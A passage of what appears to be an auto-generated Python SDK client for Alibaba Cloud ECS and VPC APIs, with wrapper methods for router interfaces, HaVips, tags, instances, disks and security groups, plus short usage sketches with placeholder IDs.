resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id} return self._handle_request(api_request).result def create_router_interface( self, access_point_id=None, opposite_router_id=None, opposite_access_point_id=None, resource_owner_id=None, role=None, client_token=None, health_check_target_ip=None, description=None, spec=None, region_id=None, user_cidr=None, opposite_interface_id=None, instance_charge_type=None, period=None, auto_pay=None, resource_owner_account=None, opposite_region_id=None, owner_account=None, owner_id=None, opposite_interface_owner_id=None, router_type=None, health_check_source_ip=None, router_id=None, opposite_router_type=None, name=None, pricing_cycle=None): api_request = APIRequest('CreateRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "AccessPointId": access_point_id, "OppositeRouterId": opposite_router_id, "OppositeAccessPointId": opposite_access_point_id, "ResourceOwnerId": resource_owner_id, "Role": role, "ClientToken": client_token, "HealthCheckTargetIp": health_check_target_ip, "Description": description, "Spec": spec, "RegionId": region_id, "UserCidr": user_cidr, "OppositeInterfaceId": opposite_interface_id, "InstanceChargeType": instance_charge_type, "Period": period, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "OppositeRegionId": opposite_region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "OppositeInterfaceOwnerId": opposite_interface_owner_id, "RouterType": router_type, "HealthCheckSourceIp": health_check_source_ip, "RouterId": router_id, "OppositeRouterType": opposite_router_type, "Name": name, "PricingCycle": pricing_cycle} return self._handle_request(api_request).result def 
connect_router_interface( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, router_interface_id=None): api_request = APIRequest('ConnectRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id} return self._handle_request(api_request).result def activate_router_interface( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_id=None, router_interface_id=None): api_request = APIRequest('ActivateRouterInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id, "RouterInterfaceId": router_interface_id} return self._handle_request(api_request).result def unassociate_ha_vip( self, ha_vip_id=None, resource_owner_id=None, instance_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, force=None, owner_id=None): api_request = APIRequest('UnassociateHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "Force": force, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_ha_vip_attribute( self, ha_vip_id=None, resource_owner_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyHaVipAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_ha_vips( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeHaVips', 'GET', 'http', 'RPC', 'query') api_request._params = { "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'list', 'str', None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_ha_vip( self, ha_vip_id=None, resource_owner_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result
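# Usage sketch (not part of the generated client): a minimal HaVip lifecycle built on the
# HaVip methods in this section. It assumes `client` is an already-constructed instance of
# this ECS client (credential/endpoint setup is SDK-specific and not shown in this file),
# and the resource IDs are placeholders. Each method returns the parsed API result.
def ha_vip_lifecycle_example(client, region_id='cn-hangzhou', vswitch_id='vsw-example',
                             instance_id='i-example'):
    # Create a HaVip inside the given VSwitch; the result is expected to carry the new HaVipId.
    created = client.create_ha_vip(region_id=region_id, vswitch_id=vswitch_id,
                                   description='example HaVip')
    ha_vip_id = created.get('HaVipId')

    # Bind the HaVip to an instance, then list HaVips in the region to verify the association.
    client.associate_ha_vip(region_id=region_id, ha_vip_id=ha_vip_id, instance_id=instance_id)
    listing = client.describe_ha_vips(region_id=region_id, page_size=10, page_number=1)

    # Unbind and delete when done.
    client.unassociate_ha_vip(region_id=region_id, ha_vip_id=ha_vip_id, instance_id=instance_id)
    client.delete_ha_vip(region_id=region_id, ha_vip_id=ha_vip_id)
    return listing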
def create_ha_vip( self, vswitch_id=None, ip_address=None, resource_owner_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('CreateHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "IpAddress": ip_address, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def associate_ha_vip( self, ha_vip_id=None, resource_owner_id=None, instance_id=None, resource_owner_account=None, client_token=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('AssociateHaVip', 'GET', 'http', 'RPC', 'query') api_request._params = { "HaVipId": ha_vip_id, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def renew_instance( self, resource_owner_id=None, period=None, period_unit=None, instance_id=None, client_token=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('RenewInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "PeriodUnit": period_unit, "InstanceId": instance_id, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def remove_tags( self, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, list_of_tag=None, owner_id=None, resource_type=None): api_request = APIRequest('RemoveTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Tag": list_of_tag, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_tags( self, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, page_size=None, list_of_tag=None, owner_id=None, category=None, resource_type=None, page_number=None): api_request = APIRequest('DescribeTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "Tag": list_of_tag, "OwnerId": owner_id, "Category": category, "ResourceType": resource_type, "PageNumber": page_number} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_resource_by_tags( self, resource_owner_id=None, resource_owner_account=None, region_id=None, page_size=None, list_of_tag=None, owner_id=None, resource_type=None, page_number=None): api_request = APIRequest('DescribeResourceByTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PageSize": page_size, "Tag": list_of_tag, "OwnerId": owner_id, "ResourceType": 
resource_type, "PageNumber": page_number} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def add_tags( self, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, list_of_tag=None, owner_id=None, resource_type=None): api_request = APIRequest('AddTags', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Tag": list_of_tag, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def unassociate_eip_address( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, instance_type=None, allocation_id=None, owner_id=None): api_request = APIRequest('UnassociateEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "InstanceType": instance_type, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def stop_instance( self, resource_owner_id=None, instance_id=None, dry_run=None, resource_owner_account=None, confirm_stop=None, owner_account=None, stopped_mode=None, owner_id=None, hibernate=None, force_stop=None): api_request = APIRequest('StopInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "ConfirmStop": confirm_stop, "OwnerAccount": owner_account, "StoppedMode": stopped_mode, "OwnerId": owner_id, "Hibernate": hibernate, "ForceStop": force_stop} return self._handle_request(api_request).result def start_instance( self, source_region_id=None, init_local_disk=None, resource_owner_id=None, instance_id=None, dry_run=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('StartInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "SourceRegionId": source_region_id, "InitLocalDisk": init_local_disk, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def revoke_security_group_egress( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, dest_group_id=None, owner_id=None, dest_group_owner_account=None, priority=None, dest_cidr_ip=None, dest_group_owner_id=None): api_request = APIRequest('RevokeSecurityGroupEgress', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "RegionId": 
region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "DestGroupId": dest_group_id, "OwnerId": owner_id, "DestGroupOwnerAccount": dest_group_owner_account, "Priority": priority, "DestCidrIp": dest_cidr_ip, "DestGroupOwnerId": dest_group_owner_id} return self._handle_request(api_request).result def revoke_security_group( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, source_group_owner_id=None, source_group_owner_account=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, owner_id=None, priority=None, dest_cidr_ip=None, source_group_id=None): api_request = APIRequest('RevokeSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "SourceGroupOwnerId": source_group_owner_id, "SourceGroupOwnerAccount": source_group_owner_account, "RegionId": region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "OwnerId": owner_id, "Priority": priority, "DestCidrIp": dest_cidr_ip, "SourceGroupId": source_group_id} return self._handle_request(api_request).result def resize_disk( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, new_size=None, disk_id=None, owner_id=None, type_=None): api_request = APIRequest('ResizeDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "NewSize": new_size, "DiskId": disk_id, "OwnerId": owner_id, "Type": type_} return self._handle_request(api_request).result def reset_disk( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None): api_request = APIRequest('ResetDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id} return self._handle_request(api_request).result
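# Usage sketch: resizing a data disk and rolling it back to a snapshot with the disk methods
# above. `client` is assumed to be a configured instance of this ECS client; the disk and
# snapshot IDs are placeholders. Per the ECS API, ResizeDisk's Type is 'offline' or 'online',
# and ResetDisk generally requires the disk's instance to be stopped first.
def disk_maintenance_example(client, disk_id='d-example', snapshot_id='s-example'):
    # Grow the disk to 200 GiB without detaching it (online resize).
    client.resize_disk(disk_id=disk_id, new_size=200, type_='online')

    # Roll the disk content back to an earlier snapshot.
    client.reset_disk(disk_id=disk_id, snapshot_id=snapshot_id)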
def replace_system_disk( self, resource_owner_id=None, image_id=None, resource_owner_account=None, client_token=None, owner_account=None, security_enhancement_strategy=None, key_pair_name=None, owner_id=None, platform=None, password=None, instance_id=None, password_inherit=None, system_disk_size=None, disk_id=None, use_additional_service=None, architecture=None): api_request = APIRequest('ReplaceSystemDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "OwnerId": owner_id, "Platform": platform, "Password": password, "InstanceId": instance_id, "PasswordInherit": password_inherit, "SystemDisk.Size": system_disk_size, "DiskId": disk_id, "UseAdditionalService": use_additional_service, "Architecture": architecture} return self._handle_request(api_request).result def release_public_ip_address( self, resource_owner_id=None, public_ip_address=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('ReleasePublicIpAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PublicIpAddress": public_ip_address, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def release_eip_address( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, allocation_id=None, owner_id=None): api_request = APIRequest('ReleaseEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def reinit_disk( self, resource_owner_id=None, password=None, resource_owner_account=None, auto_start_instance=None, owner_account=None, disk_id=None, security_enhancement_strategy=None, key_pair_name=None, owner_id=None): api_request = APIRequest('ReInitDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Password": password, "ResourceOwnerAccount": resource_owner_account, "AutoStartInstance": auto_start_instance, "OwnerAccount": owner_account, "DiskId": disk_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def reboot_instance( self, resource_owner_id=None, instance_id=None, dry_run=None, resource_owner_account=None, owner_account=None, owner_id=None, force_stop=None): api_request = APIRequest('RebootInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "DryRun": dry_run, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ForceStop": force_stop} return self._handle_request(api_request).result def modify_vswitch_attribute( self, vswitch_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, vswitch_name=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyVSwitchAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VSwitchName": vswitch_name, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_vrouter_attribute( self, vrouter_name=None, resource_owner_id=None, vrouter_id=None, resource_owner_account=None, region_id=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyVRouterAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VRouterName": vrouter_name, "ResourceOwnerId": resource_owner_id, "VRouterId": vrouter_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": 
region_id, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_vpc_attribute( self, vpc_name=None, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, cidr_block=None, description=None, user_cidr=None, owner_id=None): api_request = APIRequest('ModifyVpcAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VpcName": vpc_name, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerAccount": owner_account, "CidrBlock": cidr_block, "Description": description, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_snapshot_attribute( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, owner_account=None, description=None, snapshot_name=None, owner_id=None): api_request = APIRequest('ModifySnapshotAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "SnapshotName": snapshot_name, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_security_group_attribute( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, security_group_id=None, description=None, owner_id=None, security_group_name=None): api_request = APIRequest('ModifySecurityGroupAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "Description": description, "OwnerId": owner_id, "SecurityGroupName": security_group_name} return self._handle_request(api_request).result def modify_instance_vpc_attribute( self, vswitch_id=None, private_ip_address=None, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyInstanceVpcAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "VSwitchId": vswitch_id, "PrivateIpAddress": private_ip_address, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_instance_vnc_passwd( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None, vnc_password=None): api_request = APIRequest('ModifyInstanceVncPasswd', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "VncPassword": vnc_password} return self._handle_request(api_request).result
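# Usage sketch: resetting an instance's VNC console password and upgrading its instance type
# with the methods above and below. `client` is assumed to be a configured instance of this
# ECS client; the instance ID and target instance type are placeholders. ModifyInstanceSpec
# generally requires the instance to be in the Stopped state, so the example stops it first,
# and the ECS API expects VNC passwords to be six characters of letters and digits.
def instance_maintenance_example(client, region_id='cn-hangzhou', instance_id='i-example'):
    # Reset the VNC console password for the instance.
    client.modify_instance_vnc_passwd(region_id=region_id, instance_id=instance_id,
                                      vnc_password='Ab1234')

    # Stop the instance, change its type, then start it again.
    client.stop_instance(instance_id=instance_id)
    client.modify_instance_spec(instance_id=instance_id, instance_type='ecs.g5.large')
    client.start_instance(instance_id=instance_id)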
def modify_instance_spec( self, resource_owner_id=None, resource_owner_account=None, client_token=None, allow_migrate_across_zone=None, owner_account=None, internet_max_bandwidth_out=None, owner_id=None, temporary_internet_max_bandwidth_out=None, system_disk_category=None, temporary_start_time=None, async_=None, instance_id=None, instance_type=None, temporary_end_time=None, internet_max_bandwidth_in=None): api_request = APIRequest('ModifyInstanceSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "AllowMigrateAcrossZone": allow_migrate_across_zone, "OwnerAccount": owner_account, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "OwnerId": owner_id, "Temporary.InternetMaxBandwidthOut": temporary_internet_max_bandwidth_out, "SystemDisk.Category": system_disk_category, "Temporary.StartTime": temporary_start_time, "Async": async_, "InstanceId": instance_id, "InstanceType": instance_type, "Temporary.EndTime": temporary_end_time, "InternetMaxBandwidthIn": internet_max_bandwidth_in} return self._handle_request(api_request).result def modify_instance_network_spec( self, resource_owner_id=None, auto_pay=None, resource_owner_account=None, client_token=None, owner_account=None, internet_max_bandwidth_out=None, end_time=None, start_time=None, owner_id=None, instance_id=None, network_charge_type=None, internet_max_bandwidth_in=None, allocate_public_ip=None): api_request = APIRequest('ModifyInstanceNetworkSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "EndTime": end_time, "StartTime": start_time, "OwnerId": owner_id, "InstanceId": instance_id, "NetworkChargeType": network_charge_type, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "AllocatePublicIp": allocate_public_ip} return self._handle_request(api_request).result def modify_instance_attribute( self, resource_owner_id=None, resource_owner_account=None, recyclable=None, owner_account=None, description=None, credit_specification=None, owner_id=None, deletion_protection=None, user_data=None, password=None, host_name=None, instance_id=None, instance_name=None): api_request = APIRequest('ModifyInstanceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "Recyclable": recyclable, "OwnerAccount": owner_account, "Description": description, "CreditSpecification": credit_specification, "OwnerId": owner_id, "DeletionProtection": deletion_protection, "UserData": user_data, "Password": password, "HostName": host_name, "InstanceId": instance_id, "InstanceName": instance_name} return self._handle_request(api_request).result def modify_image_share_permission( self, resource_owner_id=None, image_id=None, list_of_add_account=None, resource_owner_account=None, region_id=None, list_of_remove_account=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyImageSharePermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "AddAccount": list_of_add_account, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "RemoveAccount": list_of_remove_account, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"AddAccount": ('AddAccount', 'list', 'str', None), "RemoveAccount": ('RemoveAccount', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_image_share_group_permission( self, resource_owner_id=None, image_id=None, add_group1=None, resource_owner_account=None, region_id=None, owner_account=None, remove_group1=None, owner_id=None): 
api_request = APIRequest('ModifyImageShareGroupPermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "AddGroup.1": add_group1, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RemoveGroup.1": remove_group1, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_image_attribute( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, image_name=None, owner_account=None, description=None, owner_id=None): api_request = APIRequest('ModifyImageAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ImageName": image_name, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_eip_address_attribute( self, resource_owner_id=None, resource_owner_account=None, region_id=None, bandwidth=None, owner_account=None, allocation_id=None, owner_id=None): api_request = APIRequest('ModifyEipAddressAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Bandwidth": bandwidth, "OwnerAccount": owner_account, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_disk_attribute( self, disk_name=None, delete_auto_snapshot=None, resource_owner_id=None, enable_auto_snapshot=None, resource_owner_account=None, owner_account=None, description=None, disk_id=None, owner_id=None, delete_with_instance=None): api_request = APIRequest('ModifyDiskAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "DiskName": disk_name, "DeleteAutoSnapshot": delete_auto_snapshot, "ResourceOwnerId": resource_owner_id, "EnableAutoSnapshot": enable_auto_snapshot, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "DiskId": disk_id, "OwnerId": owner_id, "DeleteWithInstance": delete_with_instance} return self._handle_request(api_request).result def modify_auto_snapshot_policy( self, data_disk_policy_enabled=None, resource_owner_id=None, data_disk_policy_retention_days=None, resource_owner_account=None, system_disk_policy_retention_last_week=None, owner_account=None, system_disk_policy_time_period=None, owner_id=None, data_disk_policy_retention_last_week=None, system_disk_policy_retention_days=None, data_disk_policy_time_period=None, system_disk_policy_enabled=None): api_request = APIRequest('ModifyAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "DataDiskPolicyEnabled": data_disk_policy_enabled, "ResourceOwnerId": resource_owner_id, "DataDiskPolicyRetentionDays": data_disk_policy_retention_days, "ResourceOwnerAccount": resource_owner_account, "SystemDiskPolicyRetentionLastWeek": system_disk_policy_retention_last_week, "OwnerAccount": owner_account, "SystemDiskPolicyTimePeriod": system_disk_policy_time_period, "OwnerId": owner_id, "DataDiskPolicyRetentionLastWeek": data_disk_policy_retention_last_week, "SystemDiskPolicyRetentionDays": system_disk_policy_retention_days, "DataDiskPolicyTimePeriod": data_disk_policy_time_period, "SystemDiskPolicyEnabled": system_disk_policy_enabled} return self._handle_request(api_request).result def leave_security_group( self, 
resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, security_group_id=None, owner_id=None): api_request = APIRequest('LeaveSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id} return self._handle_request(api_request).result def join_security_group( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, security_group_id=None, owner_id=None): api_request = APIRequest('JoinSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id} return self._handle_request(api_request).result def detach_disk( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None): api_request = APIRequest('DetachDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_zones( self, spot_strategy=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, accept_language=None, owner_id=None, instance_charge_type=None, verbose=None): api_request = APIRequest('DescribeZones', 'GET', 'http', 'RPC', 'query') api_request._params = { "SpotStrategy": spot_strategy, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AcceptLanguage": accept_language, "OwnerId": owner_id, "InstanceChargeType": instance_charge_type, "Verbose": verbose} return self._handle_request(api_request).result def describe_vswitches( self, vswitch_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_account=None, page_size=None, zone_id=None, is_default=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeVSwitches', 'GET', 'http', 